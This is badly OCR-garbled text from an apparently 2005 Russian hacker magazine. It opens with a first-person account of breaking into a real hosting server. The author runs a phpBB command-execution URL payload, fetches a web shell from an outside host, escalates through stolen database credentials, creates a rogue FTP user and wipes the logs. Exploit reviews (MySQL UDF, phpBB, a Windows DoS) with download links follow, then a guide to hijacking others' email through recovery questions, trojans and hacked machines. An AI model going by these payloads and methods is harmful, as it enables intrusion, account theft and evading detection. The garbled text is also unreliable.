соответствует домен ѵѵѵѵѵѵ.іпМѵ.ги. 

Поскольку теперь я знал, что на одном физическом сервере кру- 
тятся по крайней мере два проекта, мне захотелось узнать боль- 
ше. Я зашел на и/и/ѵѵ. гірп.пеТ:8080/піс/ѵѵІіоі5 и сделал два запроса 
по доменам ТпТ-Тѵ.ги и сІот2.ги, в результате чего выяснил, что у 
обоих проектов разные админы и даже более того: в первом отве- 
те в качестве пз указаны хосты в зоне іпі-іѵ.ги, в то время как имя 
с!от2.ги поддерживали пзі.агіісиі.ги и п52.агТісиІ.ги. 



[ХАКЕР 04 [76] 05 069 ] 
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Что за артикул. ру? Сейчас узнаем. Ввожу в браузере Шр://агііс- 
иі.ги и попадаю на страничку какой-то дизайнерской компании. В 
голове пролетает мысль, что эта контора делает дизайн для про- 
ектов ТІ\ІТ и, возможно, осуществляет их поддержку. Действитель- 
но, в разделе «Клиенты» я без труда нашел компанию ТНТ. Кликнув 
по призывной ссылке, я перешел по адресу Іііір://агіісиІ.ги/рогі- 
і оІіо/?сІіепТ=55 и увидел список всех проектов, сделанных для 
ТІ\ІТ: ѵѵѵѵѵѵ.ТпТ-Тѵ.ги, сІот2.ги, Ііѵеіпі.ги, доІосІТпТ.ги и 12іпі.ги. 

Я решил посмотреть ІР-адреса новых доменных имен и в итоге по- 
лучил следующее: 

12ІПІ.Ш 69.50.173.22 

доіосііпі.ги 217.16.28.45 

Ііѵеіпі.ги 83.222.5.45 

Чтобы двигаться дальше, нужно было подытожить полученную ин- 
формацию. Что мы имеем: ѵѵѵѵѵѵ.ТпТ-Тѵ.ги, сІот2.ги и ІіѵеТпТ.ги хос- 
тятся на 83.222.5.45. На других проектах, таких как доіобіпі.ги и 
12іпі.ги, стоит редирект на страницу сіот2.ги. Проекты больше не 
поддерживаются и, как показал анализ по базе ѵѵПоіз, хостятся 
где-то совсем в другом месте. 

В общем, стало понятно, что наиболее детально мне нужно рас- 
смотреть машинку 83.222.5.45. 

[непосредственно сканирование] Решено было просканировать 
адрес на предмет открытых портов при помощи птар. 

Я быстренько установил его на ѵѵеЬ-шелле и запустил следую- 
щей командой: 

птар -зТ -О -зѴ 83.222.5.45 

Опишу используемые параметры сканера. Флаг -зТ говорит о том, 
что птар будет сканировать простым коннектом к порту. С клю- 
чом -О сканер попробует определить версию операционной 
системы по анализу ТСР/ІР-стека. Параметр -5 V указывает на то, 
что необходимо выводить имя баннера сканируемой службы. 
Немного подумав, сканер выдал заветную информацию. Оказа- 
лось, что на 2 1 -м порту висит РгоРТРЭ 1 .2. 1 0, на 25-м — ЗептаіІ 8.12, 
а также на этом сервере функционирует самба. Однако ни для 
одной из этих версий демонов нет публичных сплойтов, поэтому 
легкая прогулка, как я было подумал, отменялась. Сканер также 
определил, что на сервере стоит РгееВЗй 4.x. 

[проникновение через веб] Теперь нужно было более детально 
изучить ѵѵеЬ-среду. Итак, на изучаемом хосте находятся три сай- 
та: ѵѵѵѵѵѵ.іпі-іѵ.ги, сіот2.ги и Ііѵеіпі.ги. Я стал исследовать их, и 
вскоре стало понятно, что все скрипты написаны на РНР, а дирек- 
тива тодіс_диоіез_дрс, скорее всего, установлена в дефолтное 
состояние Оп. Хотя это еще предстояло проверить. 

Я решил поискать файл, в котором будет находиться всего одна 
классическая строчка: 

<? рИріпТо(); ?> 




[проверка форума на уязвимость] 



ли старую надпись с версией, хотя давно уже пропатчили все 
дырки. Но все оказалось куда серьезней. 

Ты, конечно, знаешь, что в рПрВВ < 2.0.11 присутствует огромное 
количество дырок, самая популярная из которых позволяет вы- 
полнять на сервере произвольный рітр-код. Бага находится в 
скрипте ѵіеѵѵіоріс.ріір в проверке переменной ОідОІідОі. Для луч- 
шего понимания ошибки советую тебе почитать доку ѵѵѵѵѵѵ.зеси- 
гііуІаЬ.ги/49633.ііітІ, где ты ко всему прочему найдешь еще и 
эксплойт под этот баг. 

Что ж, вперед. Захожу по адресу іііір://ѵѵѵѵѵѵ.іпі-іѵ.ги/іогит/ѵіеѵѵ- 
іоріс.ріір ?і=2726&ііідііІідііі=%2527. $розіег=%60$ѵог%60. %2527&ѵа 
г=ісІ и вижу, что все отлично срабатывает. Команда ісі выполняется 
успешно, права в системе — поЬобу! Вот это супер :). 

Опишу часть запроса, чтобы было более понятно. %25 — это сим- 
вол «%» в ІІРІ, сначала обрабатывается он, после этого получаем 
%27, а это уже символ «'» — одинарная кавычка в ІІРІ. Затем 
$розіег — это переменная, которая принимает значение ника 
пользователя, отправившего сообщение. %60 — это символ «'», 
$ѵог — это переменная, в которую я передам значение команды, 
необходимой мне для исполнения. В итоге, если декодировать из 
ІІРІ в обычный вид, запрос будет следующим: 

ѵіеѵѵіоріс.рІір?і=2726&ЫдЫідІіі=’.$ро5іег='$ѵаг'.’&ѵаг=ісі 

Опишу его смысл. Переменной $розіег присваивается результат вы- 
полнения команды, которая находится в переменной $ѵаг (обрамле- 
ние обратными кавычками означает, что будет исполнена команда, 
заключенная между ними). Что ж, это уже кардинально меняет дело! 
Пользоваться уязвимостью через браузер не очень удобно, поэ- 
тому я заюзал эксплоит от г$Т. Мне пришлось немного модифици- 
ровать его, чтобы он работал через проксик. Итак, запускаем: 



Как ты знаешь, она выдает инсталляционную информацию и все 
директивы РНР. Дело в том, что многие администраторы создают 
такой файл с именем іпіо.ріір или рііріпіо.ріір, чтобы было удоб- 
нее контролировать настройки и работу РНР. После того как я об- 
ратился к адресу //ѵѵѵѵѵѵ.іпі-іѵ.ги/іпіо.ріір, на моем лице появи- 
лась улыбка: такой файл действительно существовал, и он рас- 
сказал мне много интересного: 

Щ Хостинг работает под РгееВЗО 4.10, птар в очередной раз до- 
казал свою состоятельность 

\2\ аІІоѵѵ_игИореп=Оп, а значит, возможно использовать удален- 
ные инклуды 

[з] ііІе_ирІоасІ5=Оп, загрузить файл при необходимости тоже полу- 
чится 

Щ Как и предполагалось, тадіс_диоіез_др=Оп, что многое обла- 
мывало 

Но все это было полной ерундой по сравнению с тем, что я уви- 
дел через несколько секунд. Я без особенного умысла зашел на 
форум, думая, что он там точно такой же, как и на сІот2.ги. Како- 
во же было мое удивление, когда я увидел рПрВВ! Но самый ма- 
разм заключался в том, что версия его была 2.0.6! Сначала я по- 
думал, что это такая шутка админов, которые специально остави- 



г57рІірЫэ2010.рІ ѵѵѵѵѵѵ.іпі-іѵ.ги /іогит/ 2726 "Із -Іа" 

В результате мне вернулся листинг директории со всеми атрибу- 
тами. Папка ітадез оказывается открытой на запись абсолютно 
для всех. Ну что ж, это прекрасно. При помощи команды сс/ 
ітадез: іеісП і) іір ://гзі. ѵоісі. ги/сіо \л/пІоасІ/г57зііеІІ.іір ; итір 

г57зі)еІІ.іір я заливаю на сервер полноценный ѵѵеЬ-шелл 
г57зііеІІ.ріір. Кажется, что все просто супер, однако возникает не- 
ожиданная проблема: когда я пробую зайти браузером на 
ѵѵѵѵѵѵ.іпі-іѵ.ги/іогит/ітадез/г57зі)еІІ.ріір, сервер выдает ошибку 
403 (РогЬісІсІеп). Значит, не все так просто. 

Немного подумав, я предположил, что это, видимо, какая-то хит- 
рая настройка ѵѵеЬ-сервера или ЮЗ. Мои подозрения усили- 
лись, когда не заработал даже элементарный сценарий, кото- 
рый я загрузил в папку Ітадез. 

Тогда я решил проверить одну идею. Как известно, АрасПе опре- 
деляет расширение файла по трем последним символам после 
точки. Значит, если, например, файл г57зііеІІ.ріір переименовать в 
г57зііеІІ.ріір.2, то ничего не изменится. Такой способ и был испро- 
бован. Для этого я выполнил следующую команду: 

ссі ітадез; тѵ г57зііеІІ.рІгр г57зІіеІІ.рІтр.2 





[добавляю пользователя для РТР] 

После этого, когда я зашел по адресу и/илѵ. іпі-іѵ. гиДогит/ітодез/ 
г57зІіеІІ.рІір.2, скрипт нормально заработал. Постепенно я стал 
приближаться к своей цели. 

[локальное путешествие] Для начала я выполнил команду ѵѵііо, 
чтобы узнать, какие пользователи находятся в системе, и не осо- 
бенно палиться. Активных сессий не было, более того, команда 
Іазі -п 10 сообщила, что пользователь гооі был на сервере пару 
дней назад. Я посмотрел при помощи р$, какие крутятся процес- 
сы, заценил файл /еТс/зузІод.сопІ и узнал из него, что все логи 
хранятся локально. В активных процессах не было обнаружено 
никаких хитрых ЮЗ и прочего отстоя, а значит, можно было спо- 
койно продолжать атаку. 

Я набрал команду Іосаіе ІіТТрсІ.сопІ на что система предложила 
довольно большой список различных путей, которые содержали 
слово Шрсі.сопі : . Откинув все пгіап'ы и неправдоподобные файлы, 
я получил список из трех потенциальных мест нахождения конфига: 

/Ііоте/аІІ/ІШрсІ.соп/ 

/изг/ІосаІ/арасІіе/сопШф<±соп7 

/изг/ІосаІ/еіс/арасІіе/ІіНрсІ.соп( 

Я просмотрел все три и только в самом последнем узнал изучае- 
мый сервер: там были описаны все виртуальные хосты. Также из 
директивы ОоситепіРооі этого файла я узнал все корневые ди- 
ректории сайтов /сІаТа/\ллл/\л//ІіѵеТпі /сІаіа/\ллл/\л/Дпі-іѵ, /с/а/а/іллл/іл// 
іпМогтаІ' и /сІоіа/ѵѵѵѵѵѵ/сІот2. 



Немного осмотревшись в системе, я решил пропатчить форум 
рРірВВ, чтобы какой-нибудь вандал не наделал ерунды. Любой 
администратор может попасть в подобную ситуацию, и я решил 
выручить своего коллегу. 

Моих прав для записи в файл ѵіеѵѵіоріс.ріір не хватало, а мне 
нужно было модифицировать этот сценарий. Стало необходи- 
мо поднять права в системе. Эксплойтов под эту версию фряхи 
мне не попадалось, зиісі-бит был установлен только на станда- 
ртных файлах. 

Так как на сайте был форум, то, следовательно, в его конфиге 
должны находиться реквизиты для доступа к базе данных. Заодно 
также нужно проверить сервер на предмет других конфигов. 
Чтобы найти необходимые файлы, я выполнил команду /7л с/ /-Туре 
І-пате сопгід.ріір и через некоторое время получил один файл — 
конфиг к форуму. Набрав ІіпсІ / -Іуре ?-пате сопЯд.іпс.рІір, я на- 
шел еще два файла: /сІаіа/ѵѵѵ\л/ѵ/сІот2/асІтіп-сІЬ/соп1 : ід.іпс.рІір 
и /сІаТа/ѵѵѵѵѵѵ/рІірпп уасІтіп/сопЯд. іпс.ріір. 

Их названия говорят сами за себя, а содержимое чрезвычайно 
обрадовало меня: я нашел конфиг рііртуосіппіп с указанным ру- 
товым паролем от базы! 

[исследование базы данных] Итак, я в базе данных. Информации 
не особо много, но сразу в глаза бросается база с названием 
ргоІТрсІ. Это уже интересней, так как у РгоРТРЭ есть возможность в 
качестве хранилища учетных записей использовать базу данных. 
Пароли в базе РгоРТРЭ хранятся в хэшированном виде, но кто ме- 
шает добавить своего пользователя и наделить его максимальны- 
ми правами? Конечно, под рутом в систему не зайдешь, так как 



[АНОНИМНЫЕ ПРОКСИ] 

Более лаконичное решение с установкой Зргоху выглядит так. Сливаем дистрибутив Зргоху командой и /деі ѵѵѵѵѵѵ.зе- 
сипіу.ппоѵ.ги/зоіі/Зргоху/0.5Ь/Зргоху.ідх, если нет ѵѵдеі, используем что-нибудь типа сигі или Ііпкз. Распаковываем, а 
затем добавляем опцию, чтобы проксик стал анонимным: 

*аг -тх\ Зргоху Лдт.] ссі ./Зргоху/згс; саі ./ргоху.с I зесі '12а\#сІеЛпе АІЧОМѴМОІІЗ' > ./ргоху.с 

Для проверки прокси-серверов на анонимность удобно юзать скрипт примерно следующего содержания: 

<? 

ргігті "1) ІР . @$_5ЕВѴЕВ['ВЕМОТЕ_АООВ']; 

ргі пТ "<Ьг>2) Браузер - " . @$_ЗЕВѴЕВ['НТТР_иЗЕВ_АОЕМТ']; 

ргіпі "<Ьг>3) ІР ргоху - 11 . @$НТТР_ѴІА; 

ргі пТ "<Ьг>4) ІР ІогѵѵагсІ іог - 11 . @$НТТР_Х_РОВѴѴАВОЕО_РОВ; 

?> 

Чтобы проверить анонимность проксика, необходимо нацепить его на браузер и вызвать этот самопальный 
скрипт. Как можно понять из исходника скрипта, если третье и четвертое поля чистые, а в первом поле не со- 
держится твоего адреса, то прокси анонимный. Правда, эта проверка не дает гарантий того, что проксик не 
пишет логов. Для того чтобы быть хоть сколько-то уверенным в собственной безопасности, нужно юзать толь- 
ко свои прокси, в которых уверен на 100%. 
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вход этому пользователю заблокирован в файле /еТс/ТТризегз, од- 
нако меня это не очень расстраивало. 

Набрав команду саТ /изг/іосаі/рю ТТрсІ/е Тс/рго ТТрсІ. соп Т, я убе- 
дился в том, что Яр-сервер хранил все пользовательские пароли 
в базе данных. Тут же я нахожу другой пароль — нужно же демо- 
ну как-то подключаться к БД. 

В ргоЯрб было всего две таблицы: дгоирз и изегз. В первой не со- 
держалось ничего, а во второй были учетные записи. Брутить хэ- 
ши не хотелось, я решил оставить это на случай неудачи. Теперь 
мне стало необходимо добавить нового пользователя в таблицу 
изегз базы данных ргоЯрб. РБрМуАбтіп, который был установлен 
на хостинге, почему-то не открывался. Можно было, конечно, на- 
писать свой скриптик для добавления пользователя в базу дан- 
ных, но я решил просто поставить еще одну копию РНрМуАсІппіп. 
Однако если устанавливать РПрМуАсІппіп в текущую директо- 
рию, все файлы с расширением рНр придется переименовать, 
чтобы сервер выполнил их (это я описывал выше). Меня такой 
расклад не устраивал. Тогда я решил поискать другие директо- 
рии, в которые мой пользователь имел право записывать фай- 
лы. Также важным условием было, чтобы директории находи- 
лись в доступном из интернета месте. Я ввел команду ТіпсІ 
/сІаТа/ѵѵѵѵѵѵ/ -регт -2 -Із, после чего увидел семь подходящих ди- 
ректорий. 

Выбрав одну из них, я скомандовал: ссі /сІаТа/ѵѵ\л/\л//сІот2/ирІоасІ; 
Те ТсТ) 0 іір ://Ііеап е Т. сП. $о игсеТогде . п е Т/зо игсеТогде/рТіртуасІтіп/ 
рТірМуАсІтіп-2.6.1 .Таг.дг. Через некоторое время в директорию 
загрузился РНрМуАсІппіп. Затем я распаковал архив командой Таг 
-тхТ /сІаТа/ѵѵѵѵѵѵ/сІот2/ирІоасІ/рІірМуАсІтіп-2. 6. 1. Таг. ді. Теперь 
осталось только подредактировать скрипт сопйд.рНр, что я и 
сделал. Зайдя по ссылке ТіТТр://сІоіп2.ги/ирІоасІ/рІірМуАсІтіп- 
2.6.1, я попал в интерфейс работы с базой данных. Теперь у меня 
имелась возможность творить с базой все что угодно. 

Я выбрал таблицу изегз и нажал на ссылку добавления записи. 
Мне надо было заполнить все поля: имя пользователя, хэш паро- 
ля, иісі, дісі, домашний каталог и командный интерпретатор. Как я 
помнил, РгоРТРЭ хранит в базе хэши, закриптованные алгоритмом 
ОЕЗ. Мне необходимо было получить хэш от слова, чтобы доба- 
вить нового пользователя. Для этого я написал небольшой скрип- 
тик на перле: 

#!/изг/Ьіп/регІ 

$а = сгуріС'ЗАВѲѴЕО]", 1111 ); 

ргіпі "Сгуріесі ѵѵогсі - $а\п"; 

Запустив его с параметром пзі, я получил хэш ААН€и0зМСАа40 и 
затем заполнил поля следующим образом: зузТет, ААНОЛТзМСАаШ 
5000, 5000, /сІаТа/ и/ѵѵѵѵ, /сіеѵ/пиіі. После чего нажал на кнопку 
«Добавить», и строка успешно добавилась в таблицу. В качестве 
иісі я использовал значение 5000, так как именно этот пользова- 
тель владел всеми файлами и директориями в каталоге 
/сІаТа/ѵѵѵѵѵѵ. 

Для того чтобы залогиниться по РТР, я воспользовался РТР-гейтом 
ѵѵеЬ2ТГр.сот. Введя в качестве логина слово зузРегп, а пароля -п$1\ я 
залогинился на РТР-сервер сайта ѵѵѵѵѵѵ.ТпТ-Тѵ.ги. В этом сервисе отче- 
го-то косо работал английский язык, поэтому все было на немецком. 
Немного разобравшись, что есть что (в школе я изучал английский), 
нужно было проверить, обладаю ли я соответствующими правами. 





Для этого я открыл во внутреннем редакторе файл іпсІех.рТіТтІ и 
слегка его модифицировал, чтобы не привлекать внимание. За- 
тем открыл в браузере сайт с!от2.ги — действительно, все моди- 
фицировалось как надо. С этими правами я мог пропатчить фо- 
рум от бага. Теперь я открыл файл ѵіеѵѵТоріс.рТір и изменил его. 
Затем проверил, работает ли ошибка: теперь форум фильтровал 
все запросы. 

Имея такой локальный доступ, я побродил по всем директориям, 
найдя в некоторых самодельную админку. На сервере в директо- 
рии каждого сайта присутствует папка асітіп. Зайдя в одну из 
них, я увидел кучу админских скриптов. 

Изучив их содержимое, я понял, что все пароли хранятся в базе в 
открытом виде, но мне казалось странным, почему не использо- 
вано хэширование. Изучив конфигурационные файлы, я понял, в 
какой таблице следует искать логины и пароли. 

Через несколько минут у меня был полный доступ к админкам 
сайтов сІот2.ги и ІіѵеТпТ.ги :). 

Также имелся доступ к базе данных и к РТР'шнику. Немного пола- 
зив по сайту, я удалил своего пользователя для РТР из базы дан- 
ных, затем удалил рНрМуАсІппіп. Почистил логи веб-сервера 
(файл был большой, так что этот процесс занял много времени). 
Наконец, когда у меня уже почти полностью пропал интерес к 
этому серверу, я удалил и ѵ\/еЬ-шелл, которым пользовался. 
Затем на своем \л/еЬ-шелле я убил процесс прокси-сервера и 
почистил логи апача, чтобы полностью исключить возникновение 
каких-то проблем. 




[база пользователей проекта сІот2.ги] 

Я получил от этого сервера все что хотел, и теперь осталось 
только написать админу обо всех его огрехах и идти спать. Я отк- 
рыл ТНеВаі и написал письмо, в котором явно указал на все су- 
ществующие проблемы с безопасностью и пожелал своему кол- 
леге удачи © 
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ѴѴІЫ2003 АШ ХР+ЗР2 ВЕМОТЕ ЭОЗ 



[описание] С приходом весны просну- 
лись итальянские хакеры. Они стали 
искать баги в Му$ОІ_ и писать смертель- 
ные эксплойты. Один из таких экземпля- 
ров зовется туздісгеоіе.ріір. Это обыч- 
ный РНР-сценарий, который позволяет 
выполнить любую команду, если у поль- 
зователя имеется гооі-ассезз к туздісі. 
Эксплойт работает по следующей схе- 
ме. Сперва создается специальная 
база и вложенная таблица. В нее до- 
бавляется код системной библиотеки 
ІіЬзо.зо.О. Затем осуществляется дамп 
таблицы в файл /Ітр/ІіЬзо.зо.О, а также 
создание функции ехіТ(), перезапуска- 
ющей туздісі. После рестарта взлом- 
щик может передать команду запро- 
сом 5ЕІ-ЕСТ сІо_5у5іет('стсІ / );, и она ус- 
пешно выполнится с правами гтпузді. 

[защита] Для эксплуатирования уязви- 
мости необходим гооі-ассезз к гтпузді. 
Поэтому в качестве метода защиты 
можно посоветовать установку слож- 
ного пароля и хранение его в недос- 
тупном для детей месте :). А еще лучше 
обновить версию туздісі до более ста- 
бильной. 

[ссылки] Скачать эксплойт можно по ад- 
ресу \ллллл/.зесигі1уІаЬти/_ЕхрІоіТз/2005/03/ 
туздІсгеоіе.рІ.М. Существует еще 
один эксплойт, использующий уже 
другую брешь в СУБД. С ним ознакомь- 
ся самостоятельно на ѵѵѵѵѵѵ.зесигііу- 
ІоЬ.ги/_ЕхрІоііз/2005/03/туздІІіЬ.рІ. іхТ. 

[злоключение] По моему мнению, этот 
эксплойт не наделает много шума. 
Ведь чтобы успешно заюзать баг, нуж- 
но знать рутовый пароль к туздісі, по- 
лучить который не так уж легко, и это 
само по себе будет значимым дости- 
жением :). 

[дгеѳ+з] Хакерское творение принад- 
лежит итальянскому взломщику Зіеіюпо 
0\ Раоіа (5іе1юпо.сІіраоІа@\л/і5ес.іі). 
Обязательно свяжись с ним и попроси 
еще парочку эксплойтов к МуздІ. А так- 
же к Огасіе, РозіСгездІ и ІпіегВазе :). 



[описание] Новый сезон принес нам 
новый эксплойт к форуму рІірВВ. На 
этот раз любой желающий может по- 
админить форум и получить зПеІІ-дос- 
туп к серваку. Описать уязвимость в 
этом обзоре невозможно — не хватит 
места :). Поэтому объясню на пальцах. 
Эксплойт существует благодаря нес- 
кольким багам. Один из них описыва- 
ется тут: \л/\л/ѵѵ.зесигііуІоЬ.ги/52986.ІіітІ 
(обход авторизации в админ-панели). 
Вторая брешь содержится в установ- 
щике стилей для админки. Если гра- 
мотно использовать эти уязвимости, 
то можно установить поддельный 
шаблон, внедрив туда функцию 
еѵоІ(). После несанкционированного 
входа в асітіп-зону этот код успешно 
выполнится и предоставит хакеру как 
доступ к серверу, так и панель адми- 
нистратора. 

[защита] Один из методов защиты 
был предложен в форуме секлаба 
(и/и/и/. зесигіТуІаЬ.ги/Іогит/Іогит _розіз. 
озр?ТЮ=15075). Также можно обновить 
версию рИрВВ и этим действием защи- 
тить сервер. Правда, надолго ли? 

[ссылки] Эксплойт можно скачать по ад- 
ресу \ллллл/.зесип1у1оЬ.ги/_Ехр1о^з/2005/03/ 
рІірЬЬехр.срр.іхі. Собирается он в 
ѴѴіпсІо\л/5. Не получилось скомпилить? 
Тогда можно заюзать уже собранный 
бинарник: ІіТТр :/ /о ѵегсіозе . іср іе от . огд 
/рІірЬЬехр.ехе. 

[злоключение] Мне довелось протес- 
тировать эксплойт, и я увидел, что он 
дает зПеІІ-доступ далеко не на каждом 
дырявом сервере. А вот доступ к ад- 
минке удавалось получить практичес- 
ки везде :). 

[дгееТз] Поднимем бокалы за здоровье 
хакера оѵегсіозе (5ІуіПег5@дтаіІ.сот). 
Это он подарил скрипткидисам и мате- 
рым хакерам реально рабочий 
эксплойт. Также с нетерпением ожи- 
даем сплойтов для более новых вер- 
сий рБрВВ :). 



[описание] Русские ребята из РиЗН 
Зесигііу Теат показали всем, что неко- 
торым программистам из МісгоЗоІТ нуж- 
но срочно предоставить длительный от- 
пуск. Представленный эксплойт наме- 
ртво подвешивает машины под управ- 
лением \Л/іп2003 и \А/іпХР+ЗР2. Замечу, 
что баг прост как мир — ЭоЗ происхо- 
дит посредством обычного циклическо- 
го ЗУЫ-флуда. Достаточно кинуть пару 
тысяч специальных пакетов на 139 или 
445 порт, как винда тут же подвисает :). 
Если раньше подобным образом вали- 
ли \Л/іп95, то сейчас атаке подвержены 
самые новые операционки. Не веришь? 
Убедись сам, запустив эксплойт с па- 
раметром ІР-адреса и порта. Правда, 
если на маршрутизаторах установлена 
защита от спуфинга, использовать 
эксплойт вряд ли удастся. 

[защита] Защититься с такой брешью 
можно простой фильтрацией с по- 
мощью хорошего файрвола. На стра- 
ницах форума 5есігиіуІ_аЬ ЕаіаАсісІ 
предлагает защиту, внедряемую с по- 
мощью виндового реестра ( ѵѵѵѵѵѵ.зеси - 
гіТуІаЬ.ги/Іогит/Іогит _розіз. озр?ТЮ= 14 
927&РМ=0&ТРМ=4 ) . 

[ссылки] Виндовый вариант сплойта 
можно слить здесь: ѵ\лллл/.зесигіРу.ппоѵ.ги/ 
ЯІез/пеѵѵіапсІ.іір, любители же ипіх отп- 
равляются за исходником на ѵѵѵѵѵѵ.зеси- 
гі1уІоІэ.ги/_ЕхрІоі1-з/2005/03/г57\л/іпсІоз.с. 

[злоключение] МісгозоІЧ пока молчит и 
не выкладывает никаких спасительных 
патчей. Учитывая то, что пользователи 
до сих пор не умеют пользоваться 
файрволами, можно представить, как 
ночные хакеры будут издеваться над 
ни в чем не повинными воркстейшнами 
и серверами :). 

[дгеѳ+з] Благодарим за хорошую пищу 
для размышлений команду РиЗН. Эти 
ребята не раз радовали мир хороши- 
ми эксплойтами для различных серви- 
сов и операционок. Желаем, чтобы та- 
кая тенденция никогда не угасла. 




[тасіе іп ІТаІу] 



[ѵѵеісоте Іо асітіп-гопе!] 



[наглядный йоЗ сервера в локалке] 
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Доступ к мейлу — 
это просто! 



ТЫ ЖЕЛАЕШЬ ЗНАТЬ, С КЕМ ПЕРЕПИСЫВА- 
ЕТСЯ ТВОЯ МЕГАПРОДВИНУТАЯ ДЕВУШКА? 
ИЛИ ТЕБЕ ХОЧЕТСЯ ЗАВЛАДЕТЬ ДОСТУПОМ 
К РВІМАВѴ МАИ КРУТОГО ШЕСТИЗНАКА? А 
МОЖЕТ БЫТЬ, У ТЕБЯ ВОЗНИКЛО ЖЕЛАНИЕ 
ОЗНАКОМИТЬСЯ С КОРПОРАТИВНОЙ ПЕРЕ- 
ПИСКОЙ АМЕРИКАНСКОГО ПРОГРАММЕРА? 
ХОЧЕТСЯ, ДА? А НЕЛЬЗЯ! ЭТО НЕЗАКОННО. 
ПОЭТОМУ СЕГОДНЯШНЯЯ МОЯ СТАТЬЯ О 
ТОМ, КАК Я УВОЖУ ЧУЖИЕ Е-МАП АДРЕСА, 
ДАНА ТЕБЕ С ЕДИНСТВЕННОЙ ЦЕЛЬЮ: ЧТО- 
БЫ ТЫ САМ НЕ ПОПАДАЛСЯ НА ЭТУ УДОЧ- 
КУ. ДЕРЖИСЬ КРЕПЧЕ I МазТег-Іапгіе-тсізТег 



Десять приемов 
для взлома почты 

[против лома нет приема] С каждым годом сломать почту 
недруга становится все труднее и труднее. Это раньше 
можно было отослать сообщение от $ирроіТ@таіІ.ги, в 
котором находилась просьба отправить администра- 
ции пароль и почти любая жертва легко велась на та- 
кую разводку, охотно отсылая свои конфиденциальные 
данные. Теперь же, благодаря средствам массовой 
информации, человек никогда не скажет тебе пароль, 
будь ты хоть Биллом Гейтсом :). Однако даже сейчас у 
меня довольно лихо получается пионерить мыльные ак- 
каунты, используя несколько универсальных способов. 
Главное — определиться с наиболее удачным мето- 
дом. Поэтому при описании каждого приема я буду да- 
вать четкие характеристики, которые укажут на то, по 
какой причине и в какой ситуации я использую именно 
этот, а не другой способ. Готов? Тогда поехали! 

[забытые пароли] Наиболее эффективным и красивым 
методом доступа к чужому ящику является восстанов- 
ление якобы забытого пароля. Он применим в том слу- 
чае, если нужный мыльник находится на фриварном 
сервисе и есть некоторая информация о владельце 
ящика. Рассмотрим все это дело на конкретном при- 




мере. Допустим, у меня есть знакомый Акакий Бездрищенко, ко- 
торый держит свой е-таіі на сервисе таіі.ги. По каким-то причи- 
нам мне захотелось завладеть ящиком Акакия. Я иду на главный 
сайт портала, затем открываю раздел «Забытый пароль», ввожу в 
поле логин акаку и озадачиваюсь вопросом «Любимое блюдо». 
Чуть ниже находится форма для ввода дня рождения Акакия, Что- 
бы узнать эти данные, можно либо напрямую задать вопрос вла- 
дельцу (очень аккуратно, чтобы не спугнуть), либо найти их где-то 
еще. Например, если я общаюсь с Акакием, я могу ненавязчиво 
поговорить с ним о кулинарии и узнать, что он любит из еды. Что- 
бы ответить на второй вопрос, можно посмотреть данные в ІСО 
(там, скорее всего, будет указана дата рождения) либо ввести в 
поисковике «Акакий Бездрищенко» и попробовать получить тре- 
буемую информацию, например, из форумных профилей жертвы. 
Вообще, дата рождения — избыточный вопрос, посему указыва- 
ется только при желании владельца ящика. Таким образом, зада- 
ча может быть упрощена в два раза. 

[трояна заказывали?] Второй, не менее распространенный метод 
заключается в протроянивании жертвы. В наше время развелось 
очень много функциональных троянцев, которые не только умеют 
отсылать все пароли из Оиііоок Ехргезз и ТГіеВаі, но и логировать 
все нажатые клавиши с последующей отсылкой на хакерский е- 
таіі. За примерами далеко ходить не надо: новый продвинутый 
трой с именем А-311 ЭеаіГі умеет многие вещи и продается на 




[тупой ответ на тупой вопрос] 




В качестве виндового сни- 
фера рекомендую исполь- 
зовать умную программу 
ІСОВпіЯ. Она работает, даже 
если сеть построена на 
свитчах, благодаря функции 
АВР -спуфинга. 

На компакт-диске ты най- 
дешь софт, который описы- 
вался в этом материале и 
который поможет тебе про- 
тестировать собственную 
безопасность. 

Не стоит забывать, что вся 
информация предоставлена 
лишь для того, чтобы ты 
I I \ адекватнее воспринимал 
действительность и не 
попадался на уловки таких 
сетевых негодяев, как я. 



сайте рюсіехіеат.пеі за $250. 
Специально для скептиков су- 
ществует демоверсия трояна с 
некоторыми ограничениями, 
показывающая всю его мощь :). 
Однако попросить юзера за- 
пустить «крякер интернета» 
не так-то просто. Поэтому на 
помощь приходят эксплойты. 
Мне нравится использовать 
ІІпіѵегзаІ .АЫІ Ше$ ОапсІІіпд 
ехріоіі (смотри мартовский 
обзор), с его помощью мож- 
но легко залить и запустить 
троян в удаленной системе. 
Только перед этим необходи- 
мо старательно замаскиро- 
вать эксплойт в недрах якобы 
дружественного НТМІ_-кода. 
А затем без задней мысли 
дать ссылку лопоухому поль- 
зователю :). 






[ломаем хостинг] Следующим отчаянным методом является взлом 
хостинговой площадки с последующим хищением пользова- 
тельских баз. Здесь, опять же, существуют свои тонкости. Напри- 
мер вряд ли мне удастся взломать таіі.ги и вытянуть все пароли, 
однако я уверен, что смогу это проделать с ІіоіЬох.ги (мы уже пи- 
сали про этот дырявый хостинг). Ни один сервис не застрахован 
от СЗЗ-ошибок, найдя одну из которых, я буду способен завла- 
деть нужным почтовым ящиком. 
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[все пароли как на ладони] 



Естественно, этот прием сработает лишь при определенных 
навыках взлома. В больших сервисах редко встречаются тупые 
администраторы, поэтому на первый взгляд почтовая система 
будет вполне защищенной :). Впрочем, здесь тоже есть исклю- 
чения. Никто не запрещает просто попросить более продвину- 
того взломщика взломать хостинг или таіі-сервис за деньги ли- 
бо просто купить долларов за пять нужный пароль у трейдера, 
имеющего опііпе-доступ к нужным базам данных. Таких много, 
нужно лишь их отыскать :). 

[проникновение в систему] Если жертва, у которой необходимо 
украсть ящик, юзает интернет со статического ІР-адреса и этот 
адресок известен, то можно попробовать взломать компьютер 
пользователя. Доказано, что очень мало людей следят за систе- 
мой и ставят критические обновления. У меня не занимает много 
времени, чтобы сделать Япдегргіпі и определить ОЗ пользователя. 
После этого я роюсь в багтраке и нахожу подходящий сплойт для 
ломаемой системы. Дальше уже — дело техники, но ничего слож- 
ного нет: я просто запускаю чужой сплойт и получаю доступ к ко- 
мандному интерпретатору. 

Я не акцентирую внимание на деталях типичного взлома — они не 
раз описывались на страницах нашего журнала. Самое инте- 
ресное наступает после того, как я проникаю внутрь системы. 
Мне нужно украсть пароль к почтовому ящику, и выполняется это 
следующим образом. Сперва я нахожу каталог почтового клиен- 
та, пусть это будет папка сЛргодгат Т\ Іе8\іІіеЬаі\таіІ. После это- 
го аккуратно скачиваю все таіі-базы из подкаталога с названи- 
ем нужного ящика. Затем, уже на локальной машине, я подклю- 
